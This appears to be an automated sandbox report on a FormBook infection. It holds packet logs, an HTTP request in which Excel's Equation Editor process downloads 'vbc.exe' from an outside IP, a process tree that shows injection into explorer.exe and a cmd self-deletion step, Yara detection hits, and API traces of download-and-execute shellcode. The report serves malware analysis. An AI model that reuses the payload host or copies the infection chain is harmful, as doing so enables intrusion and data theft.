                                        May 13, 2022 17:07:42.650315046 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650332928 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650336981 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650347948 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650352955 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650366068 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650368929 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650382042 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650389910 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650399923 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650418043 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650434017 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650449991 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650470018 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650485992 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650502920 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650518894 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650536060 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650552034 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650568008 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650660992 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650676966 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650679111 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650681019 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650682926 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650685072 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650686979 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650688887 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650690079 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650691986 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650693893 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650695086 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.654114008 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.862386942 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862466097 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862489939 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862515926 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862540007 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862564087 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862590075 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862615108 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862654924 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.862694025 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864530087 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864564896 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864583969 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864607096 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864633083 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864653111 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864671946 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864675999 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864700079 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864701033 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864703894 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864720106 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864727020 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864737988 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864747047 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864758015 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864768028 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864783049 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864784956 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864805937 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864809036 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864830017 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864831924 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864845991 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864855051 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864877939 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864881992 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864902020 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864903927 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864926100 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864926100 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864938974 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864950895 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864964962 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864978075 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.865000963 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.865011930 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.865690947 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869189978 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869223118 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869240999 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869254112 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869271994 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869288921 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869302034 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869319916 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869327068 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869334936 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869352102 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869357109 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869366884 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869373083 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869389057 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869393110 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869411945 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869416952 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869431019 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869436979 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869450092 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869458914 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869468927 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869476080 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869488955 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869496107 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869507074 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869512081 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869524956 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869533062 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869544029 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869549990 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869571924 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869576931 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869609118 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.878055096 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.078670979 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078722954 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078739882 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078752995 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078769922 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078788996 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078805923 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078824043 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078840971 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078857899 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078876019 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078885078 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.078891993 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078908920 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078919888 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.078923941 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.078926086 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078927040 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.078938961 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.078943014 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078955889 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.078975916 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081020117 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081054926 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081072092 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081089973 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081105947 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081105947 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081124067 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081131935 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081135035 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081141949 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081151009 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081160069 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081166029 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081176043 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081176996 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081192017 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081193924 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081211090 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081211090 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081228971 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081232071 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081247091 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081248045 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081264019 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081264973 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081283092 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081286907 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081295967 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081306934 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081326008 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081330061 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081341028 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081346989 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081357956 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081361055 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081374884 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081378937 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081391096 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081396103 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081408978 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081409931 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081425905 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081425905 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081439972 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081444025 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081454992 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081459999 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081475973 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081478119 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081491947 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081496000 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081509113 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081515074 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081526041 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081527948 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081542015 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081542969 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081557989 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081562042 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081576109 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081593990 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:45.430752039 CEST4917180192.168.2.22103.156.91.153
                                        • 103.156.91.153
                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.2249171103.156.91.15380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        TimestampkBytes transferredDirectionData
                                        May 13, 2022 17:07:41.567938089 CEST2OUTGET /fdcloudfiles/vbc.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 103.156.91.153
                                        Connection: Keep-Alive
                                        May 13, 2022 17:07:41.784928083 CEST3INHTTP/1.1 200 OK
                                        Date: Fri, 13 May 2022 15:07:42 GMT
                                        Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                        Last-Modified: Fri, 13 May 2022 06:57:17 GMT
                                        ETag: "40667-5dedf2f5fd4c5"
                                        Accept-Ranges: bytes
                                        Content-Length: 263783
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/x-msdownload



                                        Target ID:0
                                        Start time:17:07:16
                                        Start date:13/05/2022
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                        Imagebase:0x13fb90000
                                        File size:28253536 bytes
                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:2
                                        Start time:17:07:42
                                        Start date:13/05/2022
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:4
                                        Start time:17:07:47
                                        Start date:13/05/2022
                                        Path:C:\Users\Public\vbc.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\Public\vbc.exe"
                                        Imagebase:0x400000
                                        File size:263783 bytes
                                        MD5 hash:5AF1C7DD89A535DEE51C3E28B4A74F8D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low

                                        Target ID:5
                                        Start time:17:07:48
                                        Start date:13/05/2022
                                        Path:C:\Users\user\AppData\Local\Temp\bmexo.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
                                        Imagebase:0xf20000
                                        File size:80384 bytes
                                        MD5 hash:FD42CBBC6D53AD34694C46731AABD852
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Target ID:6
                                        Start time:17:07:50
                                        Start date:13/05/2022
                                        Path:C:\Users\user\AppData\Local\Temp\bmexo.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
                                        Imagebase:0xf20000
                                        File size:80384 bytes
                                        MD5 hash:FD42CBBC6D53AD34694C46731AABD852
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Target ID:7
                                        Start time:17:07:55
                                        Start date:13/05/2022
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0xff040000
                                        File size:3229696 bytes
                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        Target ID:8
                                        Start time:17:08:24
                                        Start date:13/05/2022
                                        Path:C:\Windows\SysWOW64\chkdsk.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                        Imagebase:0x80000
                                        File size:16384 bytes
                                        MD5 hash:A01E18A156825557A24A643A2547AA8C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        Target ID:9
                                        Start time:17:08:28
                                        Start date:13/05/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Users\user\AppData\Local\Temp\bmexo.exe"
                                        Imagebase:0x49d30000
                                        File size:302592 bytes
                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high


                                          Execution Graph

                                          Execution Coverage:22%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:64%
                                          Total number of Nodes:161
                                          Total number of Limit Nodes:9

                                          Callgraph

                                          • Executed
                                          • Not Executed
                                          • Opacity -> Relevance
                                          • Disassembly available

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          • LoadLibraryW.KERNEL32(035D047C), ref: 035D048A
                                            • Part of subcall function 035D04A4: URLDownloadToFileW.URLMON(00000000,035D04B5,?,00000000,00000000), ref: 035D050D
                                            • Part of subcall function 035D04A4: ShellExecuteExW.SHELL32(0000003C), ref: 035D0577
                                            • Part of subcall function 035D04A4: ExitProcess.KERNEL32(00000000), ref: 035D058F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                          • String ID: <
                                          • API String ID: 2508257586-4251816714
                                          • Opcode ID: 9ccb5035057099be711a01443de9ff6ed063a4c97c623e1e17d4317a6f5189e4
                                          • Instruction ID: 596d87f5fbdc6f2768144f5032e7cec7b0fcbcaafba7830b0875e752bfb8fd75
